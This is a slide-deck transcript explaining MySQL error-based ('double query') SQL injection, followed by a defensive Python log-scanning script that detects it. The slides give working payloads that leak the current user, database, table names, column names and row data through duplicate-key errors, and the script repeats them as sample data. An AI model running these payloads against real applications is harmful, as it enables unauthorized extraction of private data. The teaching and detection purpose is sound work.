SQL Injection: A Brief Look at How the Statements Work
Vance@hst.tw
I am nobody
● Vance Lin
● A PHP programmer
● Interested in web security
● Hackstuff member
Since time is limited,
please let me tell you a story first.
OK, the story goes like this.
At this point... Xiaoming, being a beginner, had no choice but to give up...
But
you came here today, so how could you give up just like Xiaoming did?
OK, the story is over.
Those who want to sleep can start now; the rest is all principles, and it's boring.
Buddha's Palm, Form 101
select count(*), concat('~',(select user()),'~',
floor(rand()*2)) as a from information_schema.tables
group by a
You probably never learned Buddha's Palm,
so these may be less familiar to you...
1. concat
2. floor
3. rand
4. group by
Concat
Floor
Rand
Group by
Let's start breaking it down
select count(*), concat('~',(select user()),'~', floor(rand()*2)) as a from information_schema.tables group by a
● select user(); returns the username of the current database connection
○ so whatever you want to know, put it here, e.g. database(), version()
● rand() * 2; gives a number below 1 or above 1
● floor(rand() * 2) gives 0 or 1
● concat() joins the preceding pieces together
● from information_schema.tables has plenty of rows, so the duplicate is sure to occur
● select count(*) adding this creates the chance of a duplicate group_key
Result
What appears when it fails
Result
What appears when it succeeds
When it applies
Xiaoming already told you: it's for when you cannot use Union select
So let's switch to a different syntax and try again
Advanced use
● Get the database
○ select count(*), concat('~',(select database()),'~', floor(rand()*2)) as a from information_schema.tables group by a
● Get the table name
○ select count(*),concat((select (select (SELECT distinct concat('~',table_name,'~') FROM information_schema.tables Where table_schema='db_name' LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a
● Get the column name
○ select count(*),concat((select (select (SELECT distinct concat('~',column_name,'~') FROM information_schema.columns Where table_schema='db_name' LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a
● Get the row
○ select count(*),concat((select(select concat(concat('~',column_name,'~'))) from db_name.table_name limit 1,1),floor(rand(0)*2)) as a from information_schema.tables group by a
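As an added example that is not part of the slides, here is a small Python log-triage script a defender could run over an application's query log and the MySQL errors it receives, to spot both the basic duplicate-group_key statement broken down earlier and the information_schema variants listed above. The log lines, timestamps, and the 'db_name' and 'users' values are constructed for this example; the error text follows MySQL's standard ER_DUP_ENTRY (errno 1062) message, "Duplicate entry '...' for key 'group_key'".

```python
import re

# Constructed sample log lines (not from any real system): an application
# query log interleaved with the MySQL errors those queries produced.
SAMPLE_LINES = [
    "2024-01-01T10:00:00Z app query: select id,name from items where id = 7",
    "2024-01-01T10:00:01Z app query: select count(*), concat('~',(select user()),'~', "
    "floor(rand()*2)) as a from information_schema.tables group by a",
    "2024-01-01T10:00:01Z mysql error 1062: Duplicate entry '~root@localhost~1' for key 'group_key'",
    "2024-01-01T10:00:02Z app query: select count(*),concat((select (select (SELECT distinct "
    "concat('~',table_name,'~') FROM information_schema.tables Where table_schema='db_name' "
    "LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as a "
    "from information_schema.tables group by a",
    "2024-01-01T10:00:02Z mysql error 1062: Duplicate entry '~users~1' for key 'group_key'",
    "2024-01-01T10:00:03Z app query: select name, count(*) from items group by name",
]

# The core of the trick is floor(rand()*2) (or the seeded rand(0)) used as a
# GROUP BY key together with count(*); all three pieces must be present.
FLOOR_RAND = re.compile(r"floor\s*\(\s*rand\s*\(", re.IGNORECASE)
GROUP_BY = re.compile(r"\bgroup\s+by\b", re.IGNORECASE)
COUNT_STAR = re.compile(r"\bcount\s*\(\s*\*\s*\)", re.IGNORECASE)

# MySQL's ER_DUP_ENTRY text when the GROUP BY temporary table collides.
DUP_KEY_ERROR = re.compile(r"Duplicate entry '(?P<entry>.*)' for key 'group_key'")


def classify_line(line):
    """Return a finding dict for one log line, or None if nothing matched."""
    m = DUP_KEY_ERROR.search(line)
    if m:
        # The statements on the slides wrap the value in '~' so it stands out
        # in the error; the trailing 0/1 comes from floor(rand()*2).
        parts = m.group("entry").split("~")
        leaked = parts[1] if len(parts) >= 3 else None
        return {"kind": "error_leak", "leaked": leaked, "line": line}
    if FLOOR_RAND.search(line) and GROUP_BY.search(line) and COUNT_STAR.search(line):
        return {"kind": "double_query_payload", "leaked": None, "line": line}
    # A legitimate GROUP BY with count(*) but no floor(rand(...)) is not flagged.
    return None


def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in (classify_line(line) for line in lines) if f is not None]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LINES):
        print(finding["kind"], finding["leaked"], "::", finding["line"][:80])
```

A hit on the error pattern tells the responder not just that the technique was attempted but what the server actually revealed, since the value between the '~' markers is the one the statement was built to leak. The match on the query itself is the earlier signal: it means untrusted input reached the SQL text unparameterized, and the fix belongs in the query layer, not in the regex.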
Demo + Q&A